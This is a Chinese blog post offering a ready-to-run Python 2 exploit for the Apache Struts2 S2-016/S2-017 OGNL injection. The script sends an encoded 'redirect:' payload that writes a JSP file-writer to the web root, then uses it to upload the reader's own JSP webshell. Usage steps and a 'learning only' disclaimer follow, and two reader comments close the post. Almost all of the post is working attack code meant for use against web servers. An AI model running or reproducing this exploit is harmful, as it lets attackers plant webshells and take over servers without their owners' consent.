struts2 S2-016/S2-017 Python GetShell

    之前在看PHP,要给协会写一个CTF,偶然看到乌云上发的最新struts2漏洞以及getshell,jsp我基本上也看不懂。折腾了一下,发现挺有意思,于是写一个python的脚本来自动化getshell吧~

    ……不知不觉已经快3点了……



#coding : utf-8
__author__ = 'Phtih0n'
import requests, sys, urllib

headers = {'User-Agent':'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11'}

def GetHost(url):
	(type, rest) = urllib.splittype(url)
	(host, rest) = urllib.splithost(rest)
	return (type + "://" + host + "/")

def UpData(url):
    ma = file("shell.jsp")
    str = ma.read()
    param = {}
    param['f'] = 'bakup.jsp'
    param['t'] = str
    r = requests.post(url + "phithon.jsp", data=param, headers=headers)
    r = requests.get(url + param['f'], headers=headers, allow_redirects=False)
    if 200 == r.status_code:
        print "success"
        print "shell : " + url + param['f']
    else:
        print "fail"

def GetShell(url):
    test = url + r'''/Struts2/test.action?redirect:${%23req%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23p%3d(%23req.getRealPath(%22/%22)%2b%22phithon.jsp%22).replaceAll("\\\\", "/"),new+java.io.BufferedWriter(new+java.io.FileWriter(%23p)).append(%23req.getParameter(%22c%22)).close()}&c=%3c%25if(request.getParameter(%22f%22)!%3dnull)(new+java.io.FileOutputStream(application.getRealPath(%22%2f%22)%2brequest.getParameter(%22f%22))).write(request.getParameter(%22t%22).getBytes())%3b%25%3e'''
    r = requests.get(test, headers = headers )
    url = GetHost(url)
    r = requests.get(url + "phithon.jsp", headers = headers)
    if r.status_code == 200:
    	UpData(url)
    else:
        print "fail"

try:
    url = sys.argv[1]
except:
    print "usage : %s url" % sys.argv[0]
GetShell(url)

#/Struts2/test.action?redirect:${%23w%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse').getWriter(),%23w.println('[phithon]'),%23w.flush(),%23w.close()}



    使用条件及方法:



    1.python安装requests库,此处有安装方法:https://www.leavesongs.com/PYTHON/PythonGetLink.html

    2.将自己的jsp webshell改名为"shell.jsp",放在同一个目录下

    3.使用方法:UseOfStruts.py http://xxxx/ 即可:

    001.jpg

    一般jsp权限挺大的,只要拿到webshell,一般就是管理员之类的:

    002.jpg

    不多说了,大家继续发挥折腾吧~我睡了……

    我把源文件及我使用的jsp webshell打包发附件了。

    最后说明,代码只用作学习,请不要作为攻击手段测试国内网站。

    附件:Py Struts Getshell.zip

赞赏

喜欢这篇文章?打赏1元

评论

Floyd 回复

Thanks for finally writing about >struts2 S2-016/S2-017 Python GetShell | 离别歌 <Loved it!

hedpy 回复

r = requests.post(url + "phithon.jsp", data=param, headers=headers)
这行代码中的 phithon.jsp 是什么呢?

另外报错这个:
Traceback (most recent call last):
File "1.py", line 40, in <module>
GetShell(url)
File "1.py", line 32, in GetShell
UpData(url)
File "1.py", line 18, in UpData
r = requests.post(url + "phithon.jsp", data=param, headers=headers)
File "D:\Python27\lib\site-packages\requests\api.py", line 111, in post
return request('post', url, data=data, json=json, **kwargs)
File "D:\Python27\lib\site-packages\requests\api.py", line 57, in request
return session.request(method=method, url=url, **kwargs)
File "D:\Python27\lib\site-packages\requests\sessions.py", line 475, in request
resp = self.send(prep, **send_kwargs)
File "D:\Python27\lib\site-packages\requests\sessions.py", line 585, in send
r = adapter.send(request, **kwargs)
File "D:\Python27\lib\site-packages\requests\adapters.py", line 453, in send
raise ConnectionError(err, request=request)
requests.exceptions.ConnectionError: ('Connection aborted.', error(10054, ''))

captcha